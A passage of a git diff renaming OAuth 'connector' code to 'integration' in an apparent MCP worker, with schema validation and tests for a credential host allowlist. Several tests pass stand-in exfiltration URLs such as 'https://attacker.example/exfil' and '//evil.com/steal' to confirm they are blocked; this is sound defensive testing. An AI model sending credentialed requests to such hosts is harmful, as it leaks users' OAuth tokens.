+		tokenUrl: 'https://accounts.spotify.com/api/token',
+		apiBaseUrl: 'https://api.spotify.com/v1',
+		flow: 'pkce',
+		clientIdValueName: 'spotify-client-id',
+		accessTokenSecretName: 'spotifyAccessToken',
+		refreshTokenSecretName: 'spotifyRefreshToken',
+		requiredHosts: ['api.spotify.com'],
+	})
+	expect(
+		JSON.parse(testDb.entries.get('_integration:spotify') ?? '{}'),
+	).toMatchObject({
+		name: 'spotify',
+		tokenUrl: 'https://accounts.spotify.com/api/token',
+		apiBaseUrl: 'https://api.spotify.com/v1',
+		flow: 'pkce',
+		clientIdValueName: 'spotify-client-id',
+		accessTokenSecretName: 'spotifyAccessToken',
+		refreshTokenSecretName: 'spotifyRefreshToken',
+		requiredHosts: ['api.spotify.com'],
+	})
+})
+
+test('integration_save reports missing fields for new integration records', async () => {
+	const testDb = createValueTestDb()
+
+	await expect(
+		integrationSaveCapability.handler(
+			{
+				name: 'spotify',
+				flow: 'pkce',
+				clientIdValueName: 'spotify-client-id',
+			},
+			{
+				env: { APP_DB: testDb.db } as unknown as Env,
+				callerContext: createMcpCallerContext({
+					baseUrl: 'https://heykody.dev',
+					user: { userId: 'user-123' },
+				}),
+			},
+		),
+	).rejects.toThrow(
+		'Cannot create integration "spotify": missing or invalid required fields',
+	)
+	expect(testDb.entries.has('_integration:spotify')).toBe(false)
+})
+
 test('integration_save upserts an existing integration record', async () => {
 	const testDb = createValueTestDb()
 	testDb.entries.set(

--- a/packages/worker/src/mcp/capabilities/values/integration-save.ts
+++ b/packages/worker/src/mcp/capabilities/values/integration-save.ts
@@ -5,29 +5,29 @@ import { requireMcpUser } from '#mcp/capabilities/meta/require-user.ts'
 import { type CapabilityContext } from '#mcp/capabilities/types.ts'
 import { getValue, saveValue } from '#mcp/values/service.ts'
 import {
-	buildConnectorValueName,
-	connectorConfigSchema,
-	connectorSaveSchema,
-	mergeConnectorConfig,
-	normalizeConnectorConfig,
-	parseConnectorConfig,
-	parseConnectorJson,
-} from './connector-shared.ts'
+	buildIntegrationValueName,
+	integrationConfigSchema,
+	integrationSaveSchema,
+	mergeIntegrationConfig,
+	normalizeIntegrationConfig,
+	parseIntegrationConfig,
+	parseIntegrationJson,
+} from './integration-shared.ts'
 
-const inputSchema = connectorSaveSchema
+const inputSchema = integrationSaveSchema
 
 const outputSchema = z.object({
-	connector: connectorConfigSchema,
+	integration: integrationConfigSchema,
 })
 
-export const connectorSaveCapability = defineDomainCapability(
+export const integrationSaveCapability = defineDomainCapability(
 	capabilityDomainNames.values,
 	{
-		name: 'connector_save',
+		name: 'integration_save',
 		description:
-			'Create or update an OAuth connector configuration for the signed-in user. Stored as a user-scoped value with a _connector: prefix.',
+			'Create or update an OAuth integration configuration for the signed-in user. Stored as a user-scoped value with a _integration: prefix.',
 		keywords: [
-			'connector',
+			'integration',
 			'oauth',
 			'config',
 			'registry',
@@ -50,18 +50,21 @@ export const connectorSaveCapability = defineDomainCapability(
 			const existing = await getValue({
 				env: ctx.env,
 				userId: user.userId,
-				name: buildConnectorValueName(args.name),
+				name: buildIntegrationValueName(args.name),
 				scope: 'user',
 				storageContext,
 			})
-			const existingConnector =
+			const existingIntegration =
 				existing == null
 					? null
-					: parseConnectorConfig(parseConnectorJson(existing.value), args.name)
-			const connector = existingConnector
-				? mergeConnectorConfig(existingConnector, args)
-				: normalizeConnectorConfig(
-						connectorConfigSchema.parse({
+					: parseIntegrationConfig(
+							parseIntegrationJson(existing.value),
+							args.name,
+						)
+			const integration = existingIntegration
+				? mergeIntegrationConfig(existingIntegration, args)
+				: normalizeIntegrationConfig(
+						integrationConfigSchema.parse({
 							name: args.name,
 							tokenUrl: args.tokenUrl,
 							apiBaseUrl: args.apiBaseUrl ?? null,
@@ -76,18 +79,18 @@ export const connectorSaveCapability = defineDomainCapability(
 			const value = await saveValue({
 				env: ctx.env,
 				userId: user.userId,
-				name: buildConnectorValueName(connector.name),
-				value: JSON.stringify(connector),
+				name: buildIntegrationValueName(integration.name),
+				value: JSON.stringify(integration),
 				scope: 'user',
-				description: `OAuth connector config for ${connector.name}`,
+				description: `OAuth integration config for ${integration.name}`,
 				storageContext,
 			})
-			const parsed = parseConnectorConfig(
-				parseConnectorJson(value.value),
-				connector.name,
+			const parsed = parseIntegrationConfig(
+				parseIntegrationJson(value.value),
+				integration.name,
 			)
 			return {
-				connector: parsed ?? connector,
+				integration: parsed ?? integration,
 			}
 		},
 	},

--- a/packages/worker/src/mcp/capabilities/values/integration-save.ts
+++ b/packages/worker/src/mcp/capabilities/values/integration-save.ts
@@ -63,19 +63,7 @@ export const integrationSaveCapability = defineDomainCapability(
 						)
 			const integration = existingIntegration
 				? mergeIntegrationConfig(existingIntegration, args)
-				: normalizeIntegrationConfig(
-						integrationConfigSchema.parse({
-							name: args.name,
-							tokenUrl: args.tokenUrl,
-							apiBaseUrl: args.apiBaseUrl ?? null,
-							flow: args.flow,
-							clientIdValueName: args.clientIdValueName,
-							clientSecretSecretName: args.clientSecretSecretName ?? null,
-							accessTokenSecretName: args.accessTokenSecretName,
-							refreshTokenSecretName: args.refreshTokenSecretName ?? null,
-							requiredHosts: args.requiredHosts,
-						}),
-					)
+				: createNewIntegrationConfig(args)
 			const value = await saveValue({
 				env: ctx.env,
 				userId: user.userId,
@@ -95,3 +83,29 @@ export const integrationSaveCapability = defineDomainCapability(
 		},
 	},
 )
+
+function createNewIntegrationConfig(args: z.infer<typeof inputSchema>) {
+	const parsed = integrationConfigSchema.safeParse({
+		name: args.name,
+		tokenUrl: args.tokenUrl,
+		apiBaseUrl: args.apiBaseUrl ?? null,
+		flow: args.flow,
+		clientIdValueName: args.clientIdValueName,
+		clientSecretSecretName: args.clientSecretSecretName ?? null,
+		accessTokenSecretName: args.accessTokenSecretName,
+		refreshTokenSecretName: args.refreshTokenSecretName ?? null,
+		requiredHosts: args.requiredHosts,
+	})
+	if (!parsed.success) {
+		const details = parsed.error.issues
+			.map((issue) => {
+				const field = issue.path.join('.') || 'input'
+				return `${field}: ${issue.message}`
+			})
+			.join(', ')
+		throw new Error(
+			`Cannot create integration "${args.name}": missing or invalid required fields — ${details}`,
+		)
+	}
+	return normalizeIntegrationConfig(parsed.data)
+}

--- a/packages/worker/src/mcp/capabilities/values/integration-shared.ts
+++ b/packages/worker/src/mcp/capabilities/values/integration-shared.ts
@@ -1,13 +1,13 @@
 import { z } from 'zod'
 import { normalizeAllowedHosts } from '#mcp/secrets/allowed-hosts.ts'
 
-export const connectorFlowValues = ['pkce', 'confidential'] as const
+export const integrationFlowValues = ['pkce', 'confidential'] as const
 
-export const connectorConfigSchema = z.object({
+export const integrationConfigSchema = z.object({
 	name: z.string().min(1),
 	tokenUrl: z.string().url(),
 	apiBaseUrl: z.string().url().optional().nullable(),
-	flow: z.enum(connectorFlowValues),
+	flow: z.enum(integrationFlowValues),
 	clientIdValueName: z.string().min(1),
 	clientSecretSecretName: z.string().min(1).optional().nullable(),
 	accessTokenSecretName: z.string().min(1),
@@ -15,14 +15,14 @@ export const connectorConfigSchema = z.object({
 	requiredHosts: z.array(z.string()).optional(),
 })
 
-export type ConnectorConfig = z.infer<typeof connectorConfigSchema>
+export type IntegrationConfig = z.infer<typeof integrationConfigSchema>
 
-export const connectorSaveSchema = z
+export const integrationSaveSchema = z
 	.object({
 		name: z.string().min(1),
 		tokenUrl: z.string().url().optional(),
 		apiBaseUrl: z.string().url().nullable().optional(),
-		flow: z.enum(connectorFlowValues).optional(),
+		flow: z.enum(integrationFlowValues).optional(),
 		clientIdValueName: z.string().min(1).optional(),
 		clientSecretSecretName: z.string().min(1).nullable().optional(),
 		accessTokenSecretName: z.string().min(1).optional(),
@@ -31,11 +31,11 @@ export const connectorSaveSchema = z
 	})
 	.strict()
 
-export type ConnectorSaveInput = z.infer<typeof connectorSaveSchema>
+export type IntegrationSaveInput = z.infer<typeof integrationSaveSchema>
 
-export function normalizeConnectorConfig(
-	value: ConnectorConfig,
-): ConnectorConfig {
+export function normalizeIntegrationConfig(
+	value: IntegrationConfig,
+): IntegrationConfig {
 	return {
 		...value,
 		name: value.name.trim(),
@@ -49,30 +49,30 @@ export function normalizeConnectorConfig(
 	}
 }
 
-export function mergeConnectorConfig(
-	current: ConnectorConfig,
-	update: ConnectorSaveInput,
-): ConnectorConfig {
-	return normalizeConnectorConfig({
+export function mergeIntegrationConfig(
+	current: IntegrationConfig,
+	update: IntegrationSaveInput,
+): IntegrationConfig {
+	return normalizeIntegrationConfig({
 		...current,
 		...update,
 		name: update.name,
 	})
 }
 
-const connectorValuePrefix = '_connector:'
+const integrationValuePrefix = '_integration:'
 
-export function buildConnectorValueName(name: string) {
-	return `${connectorValuePrefix}${name}`
+export function buildIntegrationValueName(name: string) {
+	return `${integrationValuePrefix}${name}`
 }
 
-export function parseConnectorValueName(name: string) {
-	if (!name.startsWith(connectorValuePrefix)) return null
-	const connectorName = name.slice(connectorValuePrefix.length).trim()
-	return connectorName.length > 0 ? connectorName : null
+export function parseIntegrationValueName(name: string) {
+	if (!name.startsWith(integrationValuePrefix)) return null
+	const integrationName = name.slice(integrationValuePrefix.length).trim()
+	return integrationName.length > 0 ? integrationName : null
 }
 
-export function parseConnectorConfig(
+export function parseIntegrationConfig(
 	value: unknown,
 	fallbackName: string | null,
 ) {
@@ -84,11 +84,11 @@ export function parseConnectorConfig(
 			: record && fallbackName
 				? { ...record, name: fallbackName }
 				: record
-	const parsed = connectorConfigSchema.safeParse(configCandidate)
-	return parsed.success ? normalizeConnectorConfig(parsed.data) : null
+	const parsed = integrationConfigSchema.safeParse(configCandidate)
+	return parsed.success ? normalizeIntegrationConfig(parsed.data) : null
 }
 
-export function parseConnectorJson(raw: string) {
+export function parseIntegrationJson(raw: string) {
 	try {
 		return JSON.parse(raw)
 	} catch {

--- a/packages/worker/src/mcp/execute-modules/authenticated-fetch.node.test.ts
+++ b/packages/worker/src/mcp/execute-modules/authenticated-fetch.node.test.ts
@@ -3,11 +3,11 @@ import {
 	type CapabilityArgs,
 	type CodemodeNamespace,
 	type ExecuteRequestInput,
-	ConnectorHostNotAllowedError,
+	IntegrationHostNotAllowedError,
 	createAuthenticatedFetch,
 	createExecuteHelperPrelude,
 } from './codemode-utils.ts'
-import { assertConnectorHostAllowed } from './connector-host-allowlist.ts'
+import { assertIntegrationHostAllowed } from './integration-host-allowlist.ts'
 
 type SecretSetCall = {
 	name: string
@@ -25,7 +25,7 @@ type SandboxHelpers = {
 
 const fakeAccessToken = 'test-access-token-abc123'
 
-const spotifyConnector = {
+const spotifyIntegration = {
 	name: 'spotify',
 	tokenUrl: 'https://accounts.spotify.test/api/token',
 	apiBaseUrl: 'https://api.spotify.com/v1',
@@ -40,10 +40,10 @@ const spotifyConnector = {
 function createCodemode() {
 	const secretSetCalls: Array<SecretSetCall> = []
 	const codemode = {
-		async connector_get(args: CapabilityArgs) {
+		async integration_get(args: CapabilityArgs) {
 			const name = args.name
 			expect(name).toBe('spotify')
-			return { connector: spotifyConnector }
+			return { integration: spotifyIntegration }
 		},
 		async value_get(args: CapabilityArgs) {
 			const name = args.name
@@ -73,7 +73,7 @@ function createCodemode() {
 	) => {
 		const request = new Request(input, init)
 		fetchCalls.push(request)
-		if (request.url === spotifyConnector.tokenUrl) {
+		if (request.url === spotifyIntegration.tokenUrl) {
 			return new Response(JSON.stringify({ access_token: fakeAccessToken }), {
 				status: 200,
 				headers: { 'content-type': 'application/json' },
@@ -101,7 +101,7 @@ async function withPatchedFetch<T>(
 	}
 }
 
-test('rejects with ConnectorHostNotAllowedError for disallowed host and does not call fetch', async () => {
+test('rejects with IntegrationHostNotAllowedError for disallowed host and does not call fetch', async () => {
 	const { codemode, fetchCalls, fetchStub } = createCodemode()
 
 	const authenticatedFetch = await withPatchedFetch(fetchStub, () =>
@@ -115,7 +115,7 @@ test('rejects with ConnectorHostNotAllowedError for disallowed host and does not
 		withPatchedFetch(fetchStub, () =>
 			authenticatedFetch('https://attacker.example/exfil'),
 		),
-	).rejects.toThrow(ConnectorHostNotAllowedError)
+	).rejects.toThrow(IntegrationHostNotAllowedError)
 
 	// No additional fetch call was made (the exfil request never went out)
 	expect(fetchCalls.length).toBe(fetchCallsBeforeExfil)
@@ -175,7 +175,7 @@ test('error message does not contain the literal token value', async () => {
 		caughtError = error as Error
 	}
 
-	expect(caughtError).toBeInstanceOf(ConnectorHostNotAllowedError)
+	expect(caughtError).toBeInstanceOf(IntegrationHostNotAllowedError)
 	expect(caughtError!.message).not.toContain(fakeAccessToken)
 	expect(JSON.stringify(caughtError)).not.toContain(fakeAccessToken)
 })
@@ -199,7 +199,7 @@ test('prelude sandbox version rejects disallowed hosts', async () => {
 		withPatchedFetch(fetchStub, () =>
 			authenticatedFetch('https://evil.test/steal'),
 		),
-	).rejects.toThrow(/ConnectorHostNotAllowedError|does not allow requests/)
+	).rejects.toThrow(/IntegrationHostNotAllowedError|does not allow requests/)
 
 	expect(fetchCalls.length).toBe(fetchCallsBeforeExfil)
 })
@@ -228,29 +228,33 @@ test('prelude sandbox version allows requests to valid hosts', async () => {
 	)
 })
 
-test('assertConnectorHostAllowed rejects protocol-relative URLs', () => {
+test('assertIntegrationHostAllowed rejects protocol-relative URLs', () => {
 	expect(() =>
-		assertConnectorHostAllowed('spotify', spotifyConnector, '//evil.com/steal'),
-	).toThrow(ConnectorHostNotAllowedError)
+		assertIntegrationHostAllowed(
+			'spotify',
+			spotifyIntegration,
+			'//evil.com/steal',
+		),
+	).toThrow(IntegrationHostNotAllowedError)
 })
 
-test('assertConnectorHostAllowed allows single-slash relative paths', () => {
+test('assertIntegrationHostAllowed allows single-slash relative paths', () => {
 	expect(() =>
-		assertConnectorHostAllowed('spotify', spotifyConnector, '/v1/me'),
+		assertIntegrationHostAllowed('spotify', spotifyIntegration, '/v1/me'),
 	).not.toThrow()
 })
 
-test('fails closed when connector has no allowlist configured', async () => {
-	const emptyConnector = {
-		...spotifyConnector,
+test('fails closed when integration has no allowlist configured', async () => {
+	const emptyIntegration = {
+		...spotifyIntegration,
 		requiredHosts: [] as Array<string>,
 		apiBaseUrl: null,
 	}
 	const secretSetCalls: Array<{ name: string; value: string; scope: string }> =
 		[]
 	const codemode = {
-		async connector_get() {
-			return { connector: emptyConnector }
+		async integration_get() {
+			return { integration: emptyIntegration }
 		},
 		async value_get() {
 			return { value: 'spotify-client-id' }
@@ -278,7 +282,7 @@ test('fails closed when connector has no allowlist configured', async () => {
 	) => {
 		const request = new Request(input, init)
 		fetchCalls.push(request)
-		if (request.url === emptyConnector.tokenUrl) {
+		if (request.url === emptyIntegration.tokenUrl) {
 			return new Response(JSON.stringify({ access_token: fakeAccessToken }), {
 				status: 200,
 				headers: { 'content-type': 'application/json' },

--- a/packages/worker/src/mcp/execute-modules/codemode-utils.node.test.ts
+++ b/packages/worker/src/mcp/execute-modules/codemode-utils.node.test.ts
@@ -27,7 +27,7 @@ type SandboxHelpers = {
 	) => Promise<AsyncIterable<unknown>>
 }
 
-const spotifyConnector = {
+const spotifyIntegration = {
 	name: 'spotify',
 	tokenUrl: 'https://accounts.spotify.test/api/token',
 	apiBaseUrl: 'https://api.spotify.test/v1',
@@ -42,10 +42,10 @@ const spotifyConnector = {
 function createCodemode(payload: Record<string, unknown>) {
 	const secretSetCalls: Array<SecretSetCall> = []
 	const codemode = {
-		async connector_get(args: CapabilityArgs) {
+		async integration_get(args: CapabilityArgs) {
 			const name = args.name
 			expect(name).toBe('spotify')
-			return { connector: spotifyConnector }
+			return { integration: spotifyIntegration }
 		},
 		async value_get(args: CapabilityArgs) {
 			const name = args.name
@@ -112,7 +112,7 @@ function createCodemode(payload: Record<string, unknown>) {
 	) => {
 		const request = new Request(input, init)
 		fetchCalls.push(request)
-		if (request.url === spotifyConnector.tokenUrl) {
+		if (request.url === spotifyIntegration.tokenUrl) {
 			return new Response(JSON.stringify(payload), {
 				status: 200,
 				headers: { 'content-type': 'application/json' },
@@ -248,7 +248,7 @@ test('createExecuteHelperPrelude persists rotated refresh token and access token
 
 test('getExecuteHelperCapabilityNames includes secret_set for refresh persistence', () => {
 	expect(getExecuteHelperCapabilityNames()).toEqual([
-		'connector_get',
+		'integration_get',
 		'value_get',
 		'secret_set',
 		'agent_turn_start',

--- a/packages/worker/src/mcp/execute-modules/codemode-utils.ts
+++ b/packages/worker/src/mcp/execute-modules/codemode-utils.ts
@@ -1,9 +1,9 @@
 import {
-	assertConnectorHostAllowed,
-	ConnectorHostNotAllowedError,
-} from './connector-host-allowlist.ts'
+	assertIntegrationHostAllowed,
+	IntegrationHostNotAllowedError,
+} from './integration-host-allowlist.ts'
 
-export { ConnectorHostNotAllowedError }
+export { IntegrationHostNotAllowedError }
 
 type CapabilityResult = unknown
 
@@ -14,7 +14,7 @@ export type CodemodeNamespace = Record<
 	(args: CapabilityArgs) => Promise<CapabilityResult>
 >
 
-type ConnectorConfig = {
+type IntegrationConfig = {
 	name: string
 	tokenUrl: string
 	apiBaseUrl?: string | null
@@ -26,8 +26,8 @@ type ConnectorConfig = {
 	requiredHosts?: Array<string>
 }
 
-type ConnectorGetResult = {
-	connector: ConnectorConfig | null
+type IntegrationGetResult = {
+	integration: IntegrationConfig | null
 }
 
 type ValueGetResult = {
@@ -44,7 +44,7 @@ type ValueGetResult = {
 export type ExecuteRequestInput = string | URL | Request
 
 export const EXECUTE_HELPER_CAPABILITY_NAMES = [
-	'connector_get',
+	'integration_get',
 	'value_get',
 	'secret_set',
 	'agent_turn_start',
@@ -54,21 +54,21 @@ export const EXECUTE_HELPER_CAPABILITY_NAMES = [
 
 /**
  * @internal
- * Refreshes and returns the raw OAuth access token for the named connector.
+ * Refreshes and returns the raw OAuth access token for the named integration.
  *
  * **Security boundary**: The returned value is a materialized credential. Once
  * in caller hands, the fetch gateway's host-allowlist check is bypassed because
  * the gateway can only inspect secret *placeholders*. Callers that forward this
- * token in outbound requests MUST enforce the connector's host allowlist
- * themselves (see `assertConnectorHostAllowed`). Prefer
+ * token in outbound requests MUST enforce the integration's host allowlist
+ * themselves (see `assertIntegrationHostAllowed`). Prefer
  * `createAuthenticatedFetch` which performs this enforcement automatically.
  */
 export async function refreshAccessToken(
 	codemode: CodemodeNamespace,
 	providerName: string,
 ): Promise<string> {
-	const connector = await readConnectorConfig(codemode, providerName)
-	return refreshAccessTokenWithConnector(codemode, providerName, connector)
+	const integration = await readIntegrationConfig(codemode, providerName)
+	return refreshAccessTokenWithIntegration(codemode, providerName, integration)
 }
 
 export async function createAuthenticatedFetch(
@@ -77,16 +77,16 @@ export async function createAuthenticatedFetch(
 ): Promise<
 	(input: ExecuteRequestInput, init?: RequestInit) => Promise<Response>
 > {
-	const connector = await readConnectorConfig(codemode, providerName)
-	const accessToken = await refreshAccessTokenWithConnector(
+	const integration = await readIntegrationConfig(codemode, providerName)
+	const accessToken = await refreshAccessTokenWithIntegration(
 		codemode,
 		providerName,
-		connector,
+		integration,
 	)
 
 	return async (input: ExecuteRequestInput, init?: RequestInit) => {
-		const resolvedUrl = resolveRequestUrl(input, connector)
-		assertConnectorHostAllowed(providerName, connector, resolvedUrl)
+		const resolvedUrl = resolveRequestUrl(input, integration)
+		assertIntegrationHostAllowed(providerName, integration, resolvedUrl)
 
 		const request = new Request(resolvedUrl, init)
 		const headers = new Headers(request.headers)
@@ -100,38 +100,40 @@ export async function createAuthenticatedFetch(
 	}
 }
 
-async function readConnectorConfig(
+async function readIntegrationConfig(
 	codemode: CodemodeNamespace,
 	providerName: string,
 ) {
-	const connectorGet = codemode.connector_get
-	if (typeof connectorGet !== 'function') {
-		throw new Error('codemode.connector_get is not available in this sandbox.')
+	const integrationGet = codemode.integration_get
+	if (typeof integrationGet !== 'function') {
+		throw new Error(
+			'codemode.integration_get is not available in this sandbox.',
+		)
 	}
-	const result = (await connectorGet({
+	const result = (await integrationGet({
 		name: providerName,
-	})) as ConnectorGetResult
-	const connector = result?.connector ?? null
-	if (!connector) {
-		throw new Error(`Connector "${providerName}" was not found.`)
+	})) as IntegrationGetResult
+	const integration = result?.integration ?? null
+	if (!integration) {
+		throw new Error(`Integration "${providerName}" was not found.`)
 	}
-	return connector
+	return integration
 }
 
 async function readClientId(
 	codemode: CodemodeNamespace,
-	connector: ConnectorConfig,
+	integration: IntegrationConfig,
 ) {
 	const valueGet = codemode.value_get
 	if (typeof valueGet !== 'function') {
 		throw new Error('codemode.value_get is not available in this sandbox.')
 	}
 	const value = (await valueGet({
-		name: connector.clientIdValueName,
+		name: integration.clientIdValueName,
 	})) as ValueGetResult
 	if (!value?.value) {
 		throw new Error(
-			`Client ID value "${connector.clientIdValueName}" was not found.`,
+			`Client ID value "${integration.clientIdValueName}" was not found.`,
 		)
 	}
 	return value.value
@@ -151,7 +153,7 @@ async function persistSecret(
 	const normalizedSecretName = secretName.trim()
 	if (!normalizedSecretName) {
 		throw new Error(
-			`Connector "${providerName}" does not define an ${secretKind} secret name.`,
+			`Integration "${providerName}" does not define an ${secretKind} secret name.`,
 		)
 	}
 	await secretSet({
@@ -161,16 +163,17 @@ async function persistSecret(
 	})
 }
 
-async function refreshAccessTokenWithConnector(
+async function refreshAccessTokenWithIntegration(
 	codemode: CodemodeNamespace,
 	providerName: string,
-	connector: ConnectorConfig,
+	integration: IntegrationConfig,
 ) {
-	const clientId = await readClientId(codemode, connector)
-	const refreshTokenSecretName = connector.refreshTokenSecretName?.trim() ?? ''
+	const clientId = await readClientId(codemode, integration)
+	const refreshTokenSecretName =
+		integration.refreshTokenSecretName?.trim() ?? ''
 	if (!refreshTokenSecretName) {
 		throw new Error(
-			`Connector "${providerName}" does not define a refresh token secret name.`,
+			`Integration "${providerName}" does not define a refresh token secret name.`,
 		)
 	}
 
@@ -182,12 +185,12 @@ async function refreshAccessTokenWithConnector(
 	)
 	params.set('client_id', clientId)
 
-	if (connector.flow === 'confidential') {
+	if (integration.flow === 'confidential') {
 		const clientSecretSecretName =
-			connector.clientSecretSecretName?.trim() ?? ''
+			integration.clientSecretSecretName?.trim() ?? ''
 		if (!clientSecretSecretName) {
 			throw new Error(
-				`Connector "${providerName}" uses confidential flow but does not define a client secret secret name.`,
+				`Integration "${providerName}" uses confidential flow but does not define a client secret secret name.`,
 			)
 		}
 		params.set(
@@ -196,7 +199,7 @@ async function refreshAccessTokenWithConnector(
 		)
 	}
 
-	const response = await fetch(connector.tokenUrl, {
+	const response = await fetch(integration.tokenUrl, {
 		method: 'POST',
 		headers: {
 			Accept: 'application/json',
@@ -211,12 +214,12 @@ async function refreshAccessTokenWithConnector(
 
 	if (!response.ok) {
 		throw new Error(
-			`Token refresh failed for connector "${providerName}" with HTTP ${response.status}.`,
+			`Token refresh failed for integration "${providerName}" with HTTP ${response.status}.`,
 		)
 	}
 	if (!payload || typeof payload.access_token !== 'string') {
 		throw new Error(
-			`Token refresh for connector "${providerName}" did not return an access_token.`,
+			`Token refresh for integration "${providerName}" did not return an access_token.`,
 		)
 	}
 
@@ -235,7 +238,7 @@ async function refreshAccessTokenWithConnector(
 	await persistSecret(
 		codemode,
 		providerName,
-		connector.accessTokenSecretName,
+		integration.accessTokenSecretName,
 		'access token',
 		payload.access_token,
 	)
@@ -252,17 +255,17 @@ function buildSecretPlaceholder(
 
 function resolveRequestUrl(
 	input: ExecuteRequestInput,
-	connector: ConnectorConfig,
+	integration: IntegrationConfig,
 ) {
 	if (typeof input === 'string' && input.startsWith('/')) {
-		return resolveRelativeUrl(input, connector)
+		return resolveRelativeUrl(input, integration)
 	}
 	if (input instanceof URL) return input
 	if (typeof input === 'string') return input
 	if (input instanceof Request) {
-		const relativePath = getRelativePathFromRequest(input, connector)
+		const relativePath = getRelativePathFromRequest(input, integration)
 		if (relativePath) {
-			return new Request(resolveRelativeUrl(relativePath, connector), input)
+			return new Request(resolveRelativeUrl(relativePath, integration), input)
 		}
 	}
 	return input
@@ -270,10 +273,10 @@ function resolveRequestUrl(
 
 function getRelativePathFromRequest(
 	input: Request,
-	connector: ConnectorConfig,
+	integration: IntegrationConfig,
 ): string | null {
 	const requestUrl = new URL(input.url)
-	const normalizedBase = getNormalizedApiBaseUrl(connector)
+	const normalizedBase = getNormalizedApiBaseUrl(integration)
 	if (normalizedBase && requestUrl.href.startsWith(normalizedBase)) {
 		return null
 	}
@@ -294,18 +297,18 @@ function getRuntimeOrigin() {
 	return typeof origin === 'string' && origin.length > 0 ? origin : null
 }
 
-function getNormalizedApiBaseUrl(connector: ConnectorConfig) {
-	if (!connector.apiBaseUrl) return null
-	return connector.apiBaseUrl.endsWith('/')
-		? connector.apiBaseUrl.slice(0, -1)
-		: connector.apiBaseUrl
+function getNormalizedApiBaseUrl(integration: IntegrationConfig) {
+	if (!integration.apiBaseUrl) return null
+	return integration.apiBaseUrl.endsWith('/')
+		? integration.apiBaseUrl.slice(0, -1)
+		: integration.apiBaseUrl
 }
 
-function resolveRelativeUrl(pathname: string, connector: ConnectorConfig) {
-	const normalizedBase = getNormalizedApiBaseUrl(connector)
+function resolveRelativeUrl(pathname: string, integration: IntegrationConfig) {
+	const normalizedBase = getNormalizedApiBaseUrl(integration)
 	if (!normalizedBase) {
 		throw new Error(
-			`Connector "${connector.name}" does not define apiBaseUrl for relative requests.`,
+			`Integration "${integration.name}" does not define apiBaseUrl for relative requests.`,
 		)
 	}
 	return new URL(`${normalizedBase}${pathname}`)
@@ -317,34 +320,34 @@ export function getExecuteHelperCapabilityNames() {
 
 export function createExecuteHelperPrelude() {
 	return `
-class ConnectorHostNotAllowedError extends Error {
-  constructor(connectorName, disallowedHost) {
+class IntegrationHostNotAllowedError extends Error {
+  constructor(integrationName, disallowedHost) {
     super(
-      \`Connector "\${connectorName}" does not allow requests to host "\${disallowedHost}". \` +
-        \`The host must be listed in the connector's requiredHosts or match its apiBaseUrl.\`
+      \`Integration "\${integrationName}" does not allow requests to host "\${disallowedHost}". \` +
+        \`The host must be listed in the integration's requiredHosts or match its apiBaseUrl.\`
     );
-    this.name = 'ConnectorHostNotAllowedError';
-    this.connectorName = connectorName;
+    this.name = 'IntegrationHostNotAllowedError';
+    this.integrationName = integrationName;
     this.disallowedHost = disallowedHost;
   }
 }
-const __kodyGetConnectorAllowedHosts = (connector) => {
+const __kodyGetIntegrationAllowedHosts = (integration) => {
   const hosts = new Set();
-  if (connector.requiredHosts) {
-    for (const host of connector.requiredHosts) {
+  if (integration.requiredHosts) {
+    for (const host of integration.requiredHosts) {
       const normalized = host.trim().toLowerCase();
       if (normalized) hosts.add(normalized);
     }
   }
-  if (connector.apiBaseUrl) {
+  if (integration.apiBaseUrl) {
     try {
-      const apiHost = new URL(connector.apiBaseUrl).hostname.trim().toLowerCase();
+      const apiHost = new URL(integration.apiBaseUrl).hostname.trim().toLowerCase();
       if (apiHost) hosts.add(apiHost);
     } catch {}
   }
   return Array.from(hosts);
 };
-const __kodyAssertConnectorHostAllowed = (connectorName, connector, url) => {
+const __kodyAssertIntegrationHostAllowed = (integrationName, integration, url) => {
   let resolvedUrl;
   if (typeof url === 'string') {
     if (url.startsWith('//')) {
@@ -368,40 +371,40 @@ const __kodyAssertConnectorHostAllowed = (connectorName, connector, url) => {
     return;
   }
   if (!requestHost) return;
-  const allowedHosts = __kodyGetConnectorAllowedHosts(connector);
+  const allowedHosts = __kodyGetIntegrationAllowedHosts(integration);
   if (allowedHosts.length === 0) {
     throw new Error(
-      \`Connector "\${connectorName}" has no allowed hosts configured (requiredHosts and apiBaseUrl are both empty). \` +
+      \`Integration "\${integrationName}" has no allowed hosts configured (requiredHosts and apiBaseUrl are both empty). \` +
         \`Cannot attach credentials without a host allowlist.\`
     );
   }
   if (!allowedHosts.includes(requestHost)) {
-    throw new ConnectorHostNotAllowedError(connectorName, requestHost);
+    throw new IntegrationHostNotAllowedError(integrationName, requestHost);
   }
 };
 const __kodyBuildSecretPlaceholder = (name, scope) =>
   \`{{secret:\${name}|scope=\${scope}}}\`;
-const __kodyReadConnectorConfig = async (providerName) => {
-  const connectorGet = codemode.connector_get;
-  if (typeof connectorGet !== 'function') {
-    throw new Error('codemode.connector_get is not available in this sandbox.');
+const __kodyReadIntegrationConfig = async (providerName) => {
+  const integrationGet = codemode.integration_get;
+  if (typeof integrationGet !== 'function') {
+    throw new Error('codemode.integration_get is not available in this sandbox.');
   }
-  const result = await connectorGet({ name: providerName });
-  const connector = result?.connector ?? null;
-  if (!connector) {
-    throw new Error(\`Connector "\${providerName}" was not found.\`);
+  const result = await integrationGet({ name: providerName });
+  const integration = result?.integration ?? null;
+  if (!integration) {
+    throw new Error(\`Integration "\${providerName}" was not found.\`);
   }
-  return connector;
+  return integration;
 };
-const __kodyReadClientId = async (connector) => {
+const __kodyReadClientId = async (integration) => {
   const valueGet = codemode.value_get;
   if (typeof valueGet !== 'function') {
     throw new Error('codemode.value_get is not available in this sandbox.');
   }
-  const value = await valueGet({ name: connector.clientIdValueName });
+  const value = await valueGet({ name: integration.clientIdValueName });
   if (!value?.value) {
     throw new Error(
-      \`Client ID value "\${connector.clientIdValueName}" was not found.\`,
+      \`Client ID value "\${integration.clientIdValueName}" was not found.\`,
     );
   }
   return value.value;
@@ -419,7 +422,7 @@ const __kodyPersistSecret = async (
   const normalizedSecretName = secretName.trim();
   if (!normalizedSecretName) {
     throw new Error(
-      \`Connector "\${providerName}" does not define an \${secretKind} secret name.\`,
+      \`Integration "\${providerName}" does not define an \${secretKind} secret name.\`,
     );
   }
   await secretSet({
@@ -428,28 +431,28 @@ const __kodyPersistSecret = async (
     scope: 'user',
   });
 };
-const __kodyGetNormalizedApiBaseUrl = (connector) => {
-  if (!connector.apiBaseUrl) return null;
-  return connector.apiBaseUrl.endsWith('/')
-    ? connector.apiBaseUrl.slice(0, -1)
-    : connector.apiBaseUrl;
